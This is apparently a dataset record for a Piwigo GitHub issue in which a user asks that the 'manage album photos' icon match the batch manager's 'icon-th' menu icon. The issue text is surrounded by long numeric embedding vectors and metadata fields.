0.0032582138665020466, 0.007199421059340239, -0.0025602916721254587, 0.0040307799354195595, -0.000313505093799904, -0.013450861908495426, 0.016974061727523804, 0.0006564013310708106, 0.007673410698771477, -0.018750591203570366, 0.012353594414889812, 0.010494956746697426, 0.007162098772823811, 0.037889331579208374, 0.004534627310931683, -0.015585682354867458, -0.005269871558994055, 0.00885278731584549, 0.007091186940670013, 0.001959407003596425, -0.01988518051803112, -0.005777451209723949, 0.011928122490644455, 0.003778856247663498, -0.0009531115065328777, 0.00038465025136247277, -0.019347744062542915, -0.013129892759025097, 0.007288993801921606, -0.0061320108361542225, 0.01698899082839489, 0.003930010367184877, -0.013301573693752289, 0.004870525561273098, -0.0004539292713161558, -0.009576834738254547, -0.00460553914308548, -0.005937936250120401, 0.0119057297706604, -0.014443628489971161, -0.010196380317211151, -0.027319731190800667, 0.025423770770430565, 0.004642861429601908, 0.012995532713830471, 0.015779757872223854, 0.02290080115199089, -0.012629777193069458, 0.01498106587678194, -0.006770217325538397, 0.030395066365599632, 0.016093261539936066, 0.010069485753774643, 0.012659634463489056, -0.0071919565089046955, -0.027289872989058495, 0.021616922691464424, 0.02004939876496792, -0.0003832506772596389, -0.015451323240995407, 0.0035082714166492224, -0.0014145051827654243, -0.001950076431967318, 0.021646780893206596, -0.00046979112084954977, -0.003892688313499093, 0.01492135040462017, -0.018078794702887535, 0.004530895035713911, -0.00470257643610239, 0.015197533182799816, -0.006322353146970272, -0.024990836158394814, 0.024990836158394814, 0.0012232298031449318, 0.01242077350616455, 0.0024184680078178644, 0.00825563445687294, -0.009800766594707966, -0.005172834265977144, -0.009039397351443768, 0.005811041221022606, -0.011525045149028301, 0.0015012789517641068, 0.007266600616276264, 0.012293878942728043, -0.003881491720676422, -0.00468391552567482, -0.004680183250457048, -0.0074158888310194016, 0.014010692946612835, 0.019347744062542915, -0.02024347335100174, 0.0034336273092776537, -0.028797684237360954, -0.01286117359995842, 0.017093492671847343, 0.019079025834798813, 0.0022131968289613724, -0.0011112636420875788, 0.010472563095390797, -0.01658591255545616, -0.00739349564537406, -0.017929505556821823, 0.015749899670481682, 0.0055871088989079, 0.017989221960306168, -0.007348708808422089, 0.015316964127123356, -0.005930471699684858, 0.005359444301575422, 0.004023315384984016, -0.02055697701871395, -0.0061021531000733376, -0.007139705587178469, 0.014368983916938305, 0.00016783253522589803, 0.00322462385520339, -0.010203844867646694, -0.0002004893176490441, -0.030693642795085907, -0.017392069101333618, 0.007094919215887785, -0.004571949597448111, -0.010308346711099148, -0.019467175006866455, 0.017093492671847343, 0.014749668538570404, -0.020870482549071312, -0.011987837962806225, -0.010472563095390797, -0.002401673002168536, 0.024139894172549248, 0.0005229750531725585, -0.003077202010899782, -0.004877990111708641, 0.000043474341509863734, 0.006471641361713409, -0.003092130646109581, 0.018004151061177254, -0.0005598305724561214, -0.001191506045870483, -0.003767659654840827, -0.0008952623466029763, -0.0013902458595111966, 0.002308367984369397, -0.006770217325538397, 0.004739898722618818, 0.003698613727465272, -0.01178629882633686, 0.002731973072513938, -0.015973832458257675, -0.008337742649018764, -0.0035269325599074364, 0.0069381664507091045, -0.002465120516717434, 0.01885509304702282, -0.008479566313326359, 0.0007021208293735981, -0.0119057297706604, -0.012629777193069458, 0.0025323000736534595, 0.006382068153470755, -0.005837166681885719, 0.03155951574444771, -0.00952458381652832, 0.022766442969441414, 0.0027580985333770514, -0.029782984405755997, 0.011069715954363346, -0.024632543325424194, 0.002569622127339244, -0.0014219696167856455, 0.010815925896167755, 0.005564715713262558, -0.008860251866281033, -0.017481641843914986, 0.0011355229653418064, 0.012084875255823135, 0.026005994528532028, -0.015988759696483612, -0.010995072312653065, -0.008621390908956528, 0.03233581408858299, 0.00725540379062295, -0.019974753260612488, -0.01588425785303116, 0.0025490950793027878, -0.02631950005888939, 0.002004193374887109, 0.00877067819237709, -0.013995763845741749, -0.017526429146528244, -0.014525736682116985, -0.0056617530062794685, -0.03203723579645157, 0.013152285479009151, 0.018586374819278717, 0.016212692484259605, 0.01842215657234192, -0.004922776482999325, -0.009673872031271458, -0.014846705831587315, -0.0029838967602699995, 0.016302265226840973, -0.015481180511415005, -0.013391146436333656, 0.003286205232143402, -0.004713773261755705, 0.008979681879281998, -0.009950054809451103, 0.016466481611132622, -0.020736124366521835, -0.010591994039714336, 0.025976138189435005, -0.0005444352282211185, -0.0005994852399453521, 0.004183800425380468, 0.016496339812874794, 0.0019650051835924387, 0.01655605621635914, -0.02222900465130806, 0.0014089068863540888, 0.02179607003927231, -0.006005115807056427, 0.011913194321095943, -0.008710963651537895, -0.009285722859203815, 0.009718658402562141, 0.005598305258899927, 0.016720272600650787, -0.003982261288911104, 0.009420081973075867, -0.00712477695196867, -0.010950285941362381, 0.0010664771543815732, 0.014913885854184628, 0.021691568195819855, -0.0007898276089690626, -0.052250850945711136, 0.0022131968289613724, 0.023557670414447784, -0.008203383535146713, -0.011756441555917263, -0.05135512351989746, 0.01174897700548172, -0.009031932801008224, -0.012129661627113819, 0.002084435662254691, 0.008464638143777847, 0.007733126170933247, -0.007475603837519884, 0.01121153961867094, -0.001735474681481719, -0.0023904764093458652, -0.02254251018166542, 0.03430641442537308, -0.013667330145835876, 0.0008318148902617395, -0.011950516141951084, -0.017959363758563995, -0.007665946148335934, -0.003806847846135497, 0.005635627545416355, 0.006079759914427996, -0.026140354573726654, 0.007703268434852362, -0.00585582759231329, 0.0009358500828966498, -0.004758559633046389, -0.030693642795085907, -0.014689953997731209, 0.001643102616071701, -0.005157905630767345, -0.0008868649019859731, -0.00031933668651618063, 0.01174897700548172, -0.005019813776016235, -0.002269179793074727, -0.01945224590599537, -0.006893380079418421, -0.002164678182452917, -0.005206424277275801, 0.00495263421908021, 0.006945631001144648, -0.006848593708127737, 0.018870022147893906, 0.029305262491106987, 0.009061790071427822, 0.000027787422368419357, -0.011756441555917263, -0.003788186702877283, -0.013488183729350567, 0.016167907044291496, 0.013525506481528282, -0.01359268557280302, 0.02203493006527424, 0.0189297366887331, 0.010890570469200611, 0.013279180973768234, 0.01115182414650917, 0.018870022147893906, 0.019317885860800743, 0.002364350948482752, -0.049235232174396515, -0.019064096733927727, -0.006561214104294777, 0.016302265226840973, -0.0027898221742361784, -0.006057366728782654, 0.0006139475153759122, -0.012816387228667736, 0.0031593104358762503, 0.03469456359744072, 0.008934895507991314, -0.02536405622959137, -0.027513805776834488, 0.010300882160663605, -0.0011177950073033571, 0.0008826661505736411, 0.028110958635807037, -0.007206885144114494, 0.03839690983295441, 0.03809833526611328, -0.015690183266997337, 0.01359268557280302, 0.01921338401734829, 0.004385339096188545, 0.009950054809451103, 0.029499337077140808, -0.00539676658809185, -0.007557712495326996, -0.013518041931092739, -0.021527349948883057, 0.003978529013693333, 0.013488183729350567, 0.004400268197059631, 0.009785838425159454, -0.00011464863200671971, -0.013958442024886608, -0.01691434718668461, -0.01718306541442871, 0.019467175006866455, 0.0078376280143857, 0.0005714936996810138, -0.010942821390926838, -0.0162724070250988, -0.016212692484259605, -0.007557712495326996, -0.002453923923894763, -0.004654057789593935, 0.008837858214974403, 0.008606461808085442, -0.02940976433455944, -0.00994259025901556, 0.0033533850219100714, 0.016287336125969887, -0.004792149644345045, -0.02631950005888939, 0.004583145957440138, -0.016257479786872864, 0.013025390915572643, 0.007102383766323328, -0.0031779713463038206, 0.01634705252945423, 0.004926508758217096, 0.013943512924015522, 0.007994379848241806, 0.016929276287555695, -0.00671796640381217, -0.0004912512958981097, 0.019497031345963478, -0.013361289165914059, -0.0033739120699465275, 0.0073151192627847195, 0.00877067819237709, 0.0021217577159404755, 0.0008294822764582932, 0.0015479314606636763, -0.030544355511665344, -0.013622543774545193, -0.004292034078389406, 0.011741512455046177, -0.0007324449834413826, -0.009352901950478554, -0.005008617416024208, -0.005497536156326532, 0.004530895035713911, 0.01101746503263712, 0.021527349948883057, -0.0015236721374094486, -0.0008150200010277331, -0.013846475630998611, 0.0012549534440040588, -0.012204306200146675, 0.01048002764582634, 0.011734047904610634, -0.0037247391883283854, -0.010808461345732212, -0.020303187891840935, -0.012823851779103279, -0.010927892290055752, 0.038158051669597626, 0.001715880585834384, -0.0025957475882023573, -0.005493803881108761, 0.014973601326346397, 0.012473024427890778, -0.008009308949112892, -0.029797913506627083, 0.017511500045657158, 0.013002997264266014, -0.013047783635556698, 0.001282945042476058, -0.013928583823144436, 0.025184910744428635, 0.02727494388818741, -0.009785838425159454, 0.013503112830221653, -0.007628624327480793, 0.016660556197166443, 0.007259136065840721, -0.022885872051119804, 0.003213427262380719, 0.01686955988407135, -0.013406075537204742, 0.00010601791291264817, -0.0025789528153836727, -0.008203383535146713, 0.006393264979124069, -0.023318808525800705, -0.0031593104358762503, -0.005687878467142582, 0.010614386759698391, 0.010584529489278793, 0.0028308765031397343, 0.0005164436879567802, -0.00948726199567318, -0.003948671277612448, 0.00942754652351141, 0.0020377831533551216, -0.03239552676677704, -0.005915542598813772, -0.006912040989845991, -0.01655605621635914, 0.01403308566659689, -0.01142800785601139, 0.05335558205842972, 0.009748515672981739, 0.007180759683251381, -0.01069649588316679, -0.010786068625748158, -0.004635396879166365, 0.000262187299085781, -0.022288721054792404, -0.023766672238707542, -0.0070650614798069, -0.005900613963603973, -0.012458096258342266, -0.005523661617189646, -0.010241166688501835, 0.000497782661113888, -0.008919966407120228, -0.01536175049841404, 0.010271024890244007, 0.0064977663569152355, -0.00777791254222393, -0.021407920867204666, -0.017526429146528244, 0.012846245430409908, 0.01945224590599537, 0.01123393326997757, 0.005721468012779951, -0.009091648273169994, -0.001027289079502225, 0.01730249635875225, -0.015988759696483612, 0.01981053687632084, -0.0010524814715608954, 0.0027133121620863676, -0.0002871464239433408, 0.011413078755140305, -0.0028122153598815203, -0.014809384010732174, 0.022124502807855606, -0.0017588009359315038, -0.017989221960306168, 0.0011467195581644773, -0.009853017516434193, -0.015175140462815762, -0.007486800663173199, 0.01180869247764349, 0.004963831044733524, 0.022751513868570328, -0.007636088877916336, 0.01353297010064125, -0.0201240424066782, -0.020497262477874756, 0.0067216986790299416, -0.010435241274535656, 0.00005140527355251834, -0.012943282723426819, -0.0012857441324740648, -0.0021273561287671328, 0.010106807574629784, 0.006949363276362419, -0.015540895983576775, -0.008128739893436432, -0.02373681589961052, -0.014592916704714298, 0.002687186701223254, 0.003888956271111965, 0.0023009036667644978, 0.03218652307987213, 0.007236742880195379, -0.0148616349324584, 0.002401673002168536, 0.008389993570744991, 0.0011504518333822489, 0.010726353153586388, -0.00027968201902695, -0.007147170137614012, -0.02199014462530613, 0.017257709056138992, 0.001979934051632881, 0.015854401513934135, 0.016884488984942436, -0.0035064052790403366, 0.002332627307623625, -0.0017802611691877246, 0.0023065018467605114, 0.02036290243268013, -0.0148616349324584, -0.009442475624382496, -0.008069024421274662, 0.020825697109103203, 0.00024819152895361185, -0.013980834744870663, 0.025214767083525658, -0.024468326941132545, 0.0028681985568255186, -0.01634705252945423, 0.02170649729669094, -0.00809888169169426, 0.014757133089005947, 0.0036594257690012455, 0.003829241031780839, -0.016003688797354698, 0.01353297010064125, -0.02007925510406494, 0.008225777186453342, 0.029514266178011894, -0.022020000964403152, -0.00205457815900445, -0.0009129903046414256, -0.015287105925381184, 0.007341244723647833, 0.0007455076556652784, 0.025289412587881088, -0.018870022147893906, -0.005322122480720282, -0.01476459763944149, -0.0004483309749048203, -0.002620006911456585, 0.0008336809696629643, 0.0015581949846819043, -0.008539281785488129, -0.004437590017914772, 0.0005938868853263557, 0.01159222424030304, 0.030514497309923172, -0.014145052060484886, 0.005497536156326532, 0.017018849030137062, 0.047772206366062164, 0.009599227458238602, -0.006594803649932146, 0.012465559877455235, -0.010718888603150845, 0.009196150116622448, 0.004157674964517355, 0.01514528226107359, 0.017078563570976257, 0.01904916763305664, -0.000805689487606287, -0.009091648273169994, -0.022049859166145325, -0.011196610517799854, 0.055266473442316055, -0.008703499101102352, -0.006606000475585461, -0.013600150123238564, -0.0009521784377284348, -0.015190068632364273, -0.014913885854184628, 0.0022057322785258293, -0.02246786653995514, 0.014495879411697388, -0.004639129154384136, 0.0034354934468865395, -0.013988299295306206, -0.009890339337289333, 0.02758844941854477, -0.007132241036742926, 0.024244394153356552, -0.007658482063561678, 0.0038665630854666233, 0.010106807574629784, -0.0024054052773863077, -0.008696034550666809, 0.03239552676677704, -0.015824543312191963, 0.016929276287555695, -0.007912271656095982, -0.016167907044291496, -0.001067410223186016, -0.0023232968524098396, -0.010196380317211151, 0.003683685092255473, -0.004706308711320162, -0.007386031094938517, 0.006232779938727617, 0.0040681017562747, -0.012368522584438324, 0.004459983203560114, 0.016018617898225784, 0.02215436100959778, 0.02230364829301834, -0.0012400246923789382, -0.022602224722504616, 0.006904576905071735, -0.0016962866066023707, -0.002847671275958419, -0.013062712736427784, -0.015376678667962551, 0.02761830762028694, 0.015070638619363308, 0.010442705824971199, -0.03350026160478592, 0.015025852248072624, -0.006393264979124069, -0.006460444536060095, -0.0018511730013415217, 0.009039397351443768, -0.015130354091525078, 0.03111165016889572, -0.01579468511044979, -0.0038124460261315107, -0.0035754512064158916, 0.014675024896860123, 0.018108652904629707 ]
null
null
null
null
null
null
null
null
null
[ "Piwigo", "Piwigo" ]
![image](https://github.com/Piwigo/Piwigo/assets/54360213/3be33664-0a94-4cfd-8394-917d8a2c4336) This icon isn't explicit enough, seen as this link takes us to the batch manager it seems only logicial to use the same icon as in the menu ( this is the class used : "icon-th") ![image](https://github.com/Piwigo/Piwigo/assets/54360213/4e3fbdb2-7350-456a-94c4-9c7635949982)
[edit album] manage album photos icon not ovious to its use
https://api.github.com/repos/Piwigo/Piwigo/issues/2138/comments
0
2024-03-25T13:05:21
2024-03-27T14:04:39Z
https://github.com/Piwigo/Piwigo/issues/2138
2,205,725,380
2,138
false
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : [edit album] manage album photos icon not ovious to its use Issue date: --- start body --- ![image](https://github.com/Piwigo/Piwigo/assets/54360213/3be33664-0a94-4cfd-8394-917d8a2c4336) This icon isn't explicit enough, seen as this link takes us to the batch manager it seems only logicial to use the same icon as in the menu ( this is the class used : "icon-th") ![image](https://github.com/Piwigo/Piwigo/assets/54360213/4e3fbdb2-7350-456a-94c4-9c7635949982) --- end body ---
543
[ -0.039771467447280884, 0.014699418097734451, -0.008180102333426476, 0.004891308024525642, 0.004326786380261183, -0.02409597486257553, 0.013380986638367176, 0.03779017925262451, -0.009112473577260971, 0.009243588894605637, 0.0038970212917774916, -0.018603723496198654, 0.0009514923440292478, 0.005251873284578323, -0.02629578858613968, -0.004283081274479628, -0.041840169578790665, 0.05122215673327446, 0.002844461239874363, -0.014531882479786873, -0.03781931474804878, -0.06509117782115936, 0.01564635895192623, 0.020920084789395332, 0.021663067862391472, -0.018006423488259315, 0.0013994676992297173, 0.03735313192009926, -0.031059622764587402, 0.029719339683651924, 0.040179383009672165, -0.0019721840508282185, 0.0012164533836767077, 0.030185524374246597, 0.034876517951488495, -0.0008504246943630278, 0.036362484097480774, 0.048425041139125824, -0.002711525419726968, 0.002658715471625328, 0.014400768093764782, -0.041432254016399384, -0.011501675471663475, 0.016855526715517044, -0.03866427764296532, 0.013104189187288284, -0.019186455756425858, 0.013555806130170822, -0.006643146276473999, 0.03749881312251091, 0.021444542333483696, -0.025800466537475586, 0.03787758946418762, 0.0029264080803841352, -0.008551593869924545, -0.043442681431770325, 0.01647675223648548, -0.011924156919121742, -0.01953609474003315, 0.024372771382331848, 0.018370630219578743, -0.02288680523633957, -0.034963928163051605, 0.033448826521635056, 0.001966720912605524, 0.01959436759352684, 0.025188596919178963, 0.02641233429312706, -0.008799255825579166, 0.021735908463597298, 0.009906446561217308, 0.007200384046882391, 0.01939041167497635, 0.020118827000260353, 0.04626893252134323, -0.0021652141585946083, 0.04985273629426956, -0.006781545467674732, -0.0015005352906882763, -0.0021360774990171194, -0.01526758261024952, 0.04087866097688675, -0.05081424117088318, -0.008347637951374054, 0.0241251103579998, 0.012616151012480259, -0.027432115748524666, -0.05818580463528633, -0.0018337852088734508, 0.025013776496052742, 0.00997200421988964, -0.031671490520238876, -0.005532313138246536, -0.0012656213948503137, 0.053523946553468704, -0.019550664350390434, 0.017540236935019493, -0.004938655067235231, -0.0049714334309101105, -0.04070384055376053, 0.008777403272688389, -0.01692836917936802, -0.043326135724782944, 0.0025002851616591215, 0.051921434700489044, 0.03234163299202919, 0.03880996257066727, -0.02062871865928173, -0.04227721691131592, 0.06491635739803314, 0.04982359707355499, -0.0040609147399663925, -0.04927000403404236, -0.027606936171650887, 0.034701697528362274, 0.023047056049108505, -0.005925657693296671, -0.006501105614006519, 0.038635142147541046, 0.014276937581598759, -0.008879381231963634, -0.04973618686199188, 0.007480823900550604, 0.02460586465895176, -0.025042913854122162, 0.03781931474804878, 0.015588085167109966, 0.025086618959903717, 0.0015278508653864264, 0.03723658248782158, -0.02661629021167755, 0.021721340715885162, 0.06101205572485924, 0.027461253106594086, 0.009148894809186459, 0.024387340992689133, 0.00942569226026535, -0.015136467292904854, -0.015354991890490055, 0.004337712191045284, -0.036653850227594376, -0.029661066830158234, 0.021808750927448273, -0.006515673827379942, -0.04894949868321419, -0.002177961403504014, 0.008245659992098808, -0.038343776017427444, -0.012011566199362278, 0.031001349911093712, 0.02735927328467369, -0.009360134601593018, 0.03761535882949829, -0.004749266896396875, 0.02110947109758854, -0.00034007884096354246, -0.0015642716316506267, 0.000014297993402578868, -0.028408192098140717, 0.0018346956931054592, -0.00445425882935524, -0.0034253722988069057, -0.01034349575638771, 0.0035819816403090954, -0.01647675223648548, -0.023251011967658997, 0.011297719553112984, 0.005244589410722256, 0.0017409123247489333, 0.03094307705760002, -0.007932441309094429, 0.007043774705380201, -0.013934582471847534, -0.026674563065171242, -0.009622364304959774, -0.03627507761120796, 0.04262685775756836, 0.011312287300825119, -0.024795252829790115, -0.058855947107076645, -0.014757691882550716, -0.0170449148863554, 0.01163279078900814, -0.018224947154521942, 0.003572876565158367, -0.05687465891242027, -0.007437118794769049, 0.009381987154483795, -0.023906586691737175, 0.022653711959719658, 0.022508028894662857, -0.004676425363868475, 0.05468941107392311, -0.050202373415231705, 0.041781894862651825, -0.0007001890917308629, -0.022012706845998764, -0.05145524814724922, 0.039829742163419724, -0.010234232991933823, 0.028918081894516945, -0.020118827000260353, -0.020468465983867645, -0.03065171092748642, -0.004232092294842005, 0.033215731382369995, 0.0038897369522601366, -0.01012497115880251, -0.008930370211601257, -0.03892650827765465, -0.0020031416788697243, 0.018895089626312256, 0.025217734277248383, 0.03417723998427391, -0.0057180593721568584, 0.031496673822402954, -0.000021084204490762204, -0.026339493691921234, 0.007626506965607405, -0.017176030203700066, 0.029238585382699966, 0.01228836365044117, -0.007626506965607405, -0.013242588378489017, -0.04894949868321419, -0.005193600431084633, 0.012273795902729034, -0.01161822210997343, -0.002959186676889658, 0.02116774581372738, -0.0072222365997731686, 0.03601284697651863, 0.022843100130558014, -0.0218815915286541, 0.016782686114311218, -0.033274006098508835, 0.01329357735812664, -0.007917872630059719, -0.004377775359898806, -0.0039589363150298595, 0.024081405252218246, 0.02108033560216427, -0.03082653135061264, -0.011465255171060562, 0.040295928716659546, 0.034934792667627335, 0.01396371889859438, -0.03735313192009926, 0.0005576928961090744, 0.01681182160973549, 0.03237077221274376, 0.0035437399055808783, -0.026893088594079018, -0.024372771382331848, 0.013082336634397507, -0.03580889105796814, 0.050552014261484146, 0.030972212553024292, -0.019492389634251595, 0.024139679968357086, 0.036566443741321564, 0.06375089287757874, -0.03388587385416031, 0.04128657281398773, 0.014145823195576668, -0.040237654000520706, 0.0044761113822460175, -0.05133870244026184, -0.0013120578369125724, -0.06660628318786621, -0.02566935122013092, -0.012332068756222725, -0.0011909587774425745, -0.04967791587114334, -0.000164462486281991, 0.011355992406606674, 0.013016778975725174, 0.03295350447297096, 0.04941568523645401, 0.02727186493575573, 0.016345636919140816, 0.031001349911093712, 0.015762904658913612, 0.05119301751255989, 0.021357133984565735, 0.009935582987964153, 0.005481324158608913, -0.0371200367808342, -0.023819176480174065, 0.011683779768645763, -0.0202208049595356, 0.001041633659042418, -0.010503746569156647, -0.033390551805496216, 0.033477962017059326, -0.0028790610376745462, 0.0034180881921201944, 0.01539869699627161, 0.018341494724154472, -0.01933213882148266, -0.010409052483737469, 0.007214952260255814, -0.053582221269607544, -0.026193810626864433, 0.006038561929017305, 0.041607074439525604, 0.00942569226026535, 0.04420023411512375, -0.030068978667259216, -0.0014677565777674317, 0.027796322479844093, -0.0010971754090860486, -0.011669211089611053, -0.04635634273290634, -0.0015251192962750793, -0.016768118366599083, 0.006963649298995733, -0.003354351967573166, -0.01283467561006546, -0.0462980680167675, -0.0423937626183033, 0.004410553723573685, -0.0387808233499527, -0.0038678846322000027, -0.012332068756222725, 0.007458971347659826, -0.019346706569194794, -0.05815666913986206, -0.029690202325582504, -0.027810892090201378, 0.007189457770437002, -0.02581503428518772, -0.008551593869924545, 0.003893379122018814, 0.012492320500314236, -0.05605883151292801, -0.01684095896780491, 0.04559879004955292, 0.006406411528587341, 0.013475680723786354, 0.014684850350022316, -0.0035910869482904673, 0.006428264081478119, 0.015223877504467964, 0.02979218028485775, -0.04026678949594498, -0.005532313138246536, -0.006960006896406412, 0.04772576317191124, -0.00770663283765316, 0.0008253854466602206, -0.020992925390601158, -0.01541326567530632, 0.025159459561109543, -0.019346706569194794, -0.010001140646636486, 0.0187057014554739, -0.0022544448729604483, 0.012841959483921528, -0.03219595178961754, 0.0337984636425972, -0.05256243795156479, 0.00569256441667676, 0.007466255687177181, 0.018356062471866608, 0.031525809317827225, -0.00095877650892362, -0.004843960981816053, -0.01228836365044117, -0.04801712930202484, -0.006184244994074106, 0.01692836917936802, -0.0817573219537735, 0.017409123480319977, -0.00903963204473257, 0.038314636796712875, -0.025392552837729454, -0.008879381231963634, -0.013825319707393646, 0.015194741077721119, -0.013249872252345085, 0.003294257679954171, -0.03397328406572342, 0.0016043344512581825, 0.04489951208233833, 0.026718268170952797, -0.010445473715662956, 0.012142681516706944, 0.02486809343099594, 0.004071841016411781, -0.010146823711693287, -0.0022599080111831427, 0.005069769453257322, -0.0762796401977539, -0.03543011471629143, -0.005510461051017046, -0.01618538610637188, -0.031817175447940826, -0.01805012859404087, -0.0048876660875976086, 0.006475611124187708, -0.012339353561401367, -0.0035218873526901007, 0.048570726066827774, -0.011865883134305477, -0.001782796112820506, 0.02122601866722107, 0.010088549926877022, -0.012383057735860348, 0.008974075317382812, -0.019142750650644302, 0.01692836917936802, 0.005936583504080772, -0.000592747877817601, 0.01896793209016323, 0.004275796934962273, -0.00761922262609005, 0.029151175171136856, -0.006723272148519754, -0.00018517680291552097, 0.04026678949594498, -0.011297719553112984, -0.048628997057676315, 0.04425850510597229, -0.009636932983994484, -0.023702630773186684, 0.0033871305640786886, 0.012871095910668373, 0.06882066279649734, -0.011334139853715897, 0.025960717350244522, 0.01858915574848652, -0.02982131764292717, -0.03263299912214279, -0.005914731416851282, 0.0324290432035923, 0.022682849317789078, 0.011552664451301098, -0.000011545095730980393, 0.0067888293415308, 0.008828392252326012, 0.02110947109758854, 0.008340354077517986, 0.03088480420410633, -0.026659995317459106, -0.003663928247988224, 0.00493501266464591, 0.003929799888283014, -0.03592543676495552, -0.023367559537291527, -0.03930528461933136, -0.0009706132113933563, -0.01772962510585785, -0.04277253895998001, -0.012346637435257435, 0.004519816022366285, -0.023411264643073082, 0.009105189703404903, -0.011152036488056183, -0.00020475295605137944, -0.0029063764959573746, 0.001064396696165204, -0.01647675223648548, -0.023848313838243484, 0.013563090935349464, -0.009556807577610016, -0.02297421544790268, 0.03397328406572342, 0.016564160585403442, 0.00007164646376622841, -0.019871165975928307, -0.020555876195430756, 0.02463500201702118, 0.01944868452847004, -0.03729485720396042, -0.0009432976366952062, -0.016666138544678688, -0.003922515548765659, 0.02478068508207798, -0.02913660742342472, -0.011814894154667854, -0.0745314434170723, 0.004395985510200262, 0.018836816772818565, 0.02042476087808609, -0.028349919244647026, 0.062410611659288406, 0.01253602560609579, 0.003988073207437992, 0.012251943349838257, 0.01727800816297531, 0.03053516522049904, -0.010358063504099846, 0.021823318675160408, 0.007968861609697342, -0.024081405252218246, -0.0117711890488863, -0.013672352768480778, 0.005277367774397135, -0.0031303642317652702, 0.031205305829644203, -0.0005281009944155812, 0.007925157435238361, -0.004880381748080254, 0.027199022471904755, -0.015442402102053165, -0.014947079122066498, -0.006512031890451908, 0.018982499837875366, 0.0022180243395268917, -0.016112543642520905, 0.008886665105819702, -0.017438258975744247, -0.05614624172449112, 0.013992855325341225, 0.0009888235945254564, 0.023221876472234726, -0.014772259630262852, 0.02409597486257553, 0.003824179759249091, -0.012426762841641903, -0.029063764959573746, 0.010969932191073895, 0.02480982057750225, 0.006799755617976189, 0.007142110727727413, 0.008631720207631588, 0.03193372115492821, 0.011778473854064941, -0.039858877658843994, -0.03630421310663223, 0.0018292326712980866, 0.015719199553132057, 0.0008700008620508015, 0.006373632699251175, 0.045365698635578156, -0.005641575437039137, -0.012652571313083172, -0.017438258975744247, 0.00487673981115222, 0.01609797589480877, 0.003922515548765659, -0.03059343807399273, -0.0304768905043602, -0.02151738479733467, 0.006555736530572176, -0.008952222764492035, 0.002168856095522642, -0.008988643065094948, -0.01630193181335926, -0.014225948601961136, -0.014815964736044407, 0.02830621413886547, 0.02552366815507412, 0.0073132882826030254, 0.0008809270802885294, 0.01713232509791851, -0.007539097219705582, -0.02784002758562565, 0.023440400138497353, 0.014910658821463585, -0.007338782772421837, 0.04900777339935303, -0.012040702626109123, 0.0020268152002245188, -0.0038423901423811913, -0.012113544158637524, 0.035138748586177826, -0.02142997458577156, -0.023556947708129883, 0.015369560569524765, -0.011283150874078274, -0.004243018571287394, -0.017860740423202515, 0.007276867516338825, -0.016433047130703926, 0.02451845444738865, -0.0017135967500507832, -0.03219595178961754, -0.023280149325728416, 0.00491316057741642, -0.0075973705388605595, -0.006726914085447788, -0.005980288609862328, 0.03414810448884964, 0.02561107836663723, 0.019346706569194794, -0.023134466260671616, 0.005619722884148359, -0.012514173053205013, -0.021444542333483696, 0.0057981847785413265, 0.012506888248026371, 0.0015779293607920408, 0.025596508756279945, 0.02463500201702118, -0.01636020466685295, -0.0039188736118376255, -0.0015387770254164934, 0.007287793792784214, -0.03953837603330612, 0.011137467809021473, 0.019667210057377815, 0.011071911081671715, 0.010693134739995003, 0.003172248136252165, 0.006060414481908083, 0.0153112867847085, -0.02590244449675083, -0.006508389487862587, -0.017350848764181137, 0.010758692398667336, 0.013053200207650661, -0.014670281670987606, 0.026893088594079018, 0.041432254016399384, 0.0016589656006544828, 0.019142750650644302, 0.010001140646636486, -0.02223123051226139, 0.03880996257066727, -0.04422936961054802, 0.019638072699308395, -0.014648429118096828, 0.010103118605911732, 0.02753409370779991, 0.0051644635386765, 0.004337712191045284, 0.012885664589703083, 0.011720200069248676, -0.031001349911093712, -0.01902620494365692, -0.015937723219394684, -0.029005492106080055, -0.02647060714662075, 0.006592157296836376, -0.0032214161474257708, 0.01873483881354332, -0.0018383378628641367, -0.029384268447756767, -0.043734047561883926, -0.024940935894846916, 0.0015078193973749876, 0.017030347138643265, -0.021779613569378853, 0.003188637550920248, 0.01365050021559, -0.020410193130373955, 0.018545450642704964, 0.0035346345975995064, -0.03231249749660492, -0.001531492918729782, 0.010445473715662956, 0.01724887080490589, 0.019885733723640442, -0.00013031803246121854, -0.005098906345665455, 0.03566320613026619, -0.03070998378098011, -0.010962648317217827, -0.006104119122028351, -0.02703877165913582, -0.01526758261024952, 0.004818466491997242, 0.000020700079403468408, 0.026339493691921234, -0.009695205837488174, -0.014393484219908714, -0.006056772079318762, 0.014815964736044407, 0.02561107836663723, 0.0008818376227281988, -0.031642355024814606, 0.00381689565256238, -0.024227088317275047, 0.003632970619946718, -0.008813823573291302, -0.003308825893327594, -0.04216067120432854, -0.02199813909828663, 0.025683918967843056, -0.013249872252345085, -0.022158389911055565, -0.024474749341607094, 0.00005044844147050753, 0.012485036626458168, -0.027228159829974174, 0.006275296676903963, -0.005157179664820433, 0.024227088317275047, 0.020818104967474937, -0.007866883650422096, 0.003622044576331973, 0.010445473715662956, -0.00558694452047348, 0.0119897136464715, 0.01200428232550621, -0.02446018159389496, -0.00580182671546936, 0.025479963049292564, -0.0015660926001146436, -0.021706772968173027, -0.007262299302965403, 0.014917942695319653, -0.006883523426949978, 0.04146139323711395, -0.0002681478508748114, -0.0021542878821492195, 0.010562020353972912, -0.04137398302555084, -0.004512532148510218, 0.023731766268610954, -0.0028389981016516685, 0.010904375463724136, -0.0363333486020565, 0.01534042414277792, -0.023819176480174065, -0.011902304366230965, -0.03869341313838959, -0.004122829996049404, 0.0066686407662928104, -0.029355131089687347, -0.06981131434440613, -0.004672783426940441, -0.036770399659872055, 0.0001727709750412032, 0.033419687300920486, 0.010358063504099846, 0.009462113492190838, 0.007112974300980568, -0.030039841309189796, 0.014371631667017937, -0.022129252552986145, 0.014976216480135918, -0.010365348309278488, 0.026252083480358124, -0.008318501524627209, 0.01412397064268589, -0.031700629740953445, -0.0170449148863554, 0.0031758900731801987, -0.007764905691146851, -0.005131685175001621, -0.020162532106041908, -0.018443472683429718, -0.0015788398450240493, 0.0024911798536777496, 0.013344566337764263, 0.003139469539746642, -0.020657854154706, 0.040383338928222656, -0.012069839984178543, 0.024183383211493492, -0.014677565544843674, 0.0071348268538713455, -0.04306390509009361, 0.0010052128927782178, 0.02448931895196438, -0.011421550065279007, -0.019914871081709862, -0.000718399474862963, 0.0101832440122962, 0.018370630219578743, 0.03953837603330612, -0.00987002532929182, 0.03808154538273811, 0.04886208847165108, -0.014444473199546337, 0.014932511374354362, -0.015136467292904854, -0.006431906018406153, 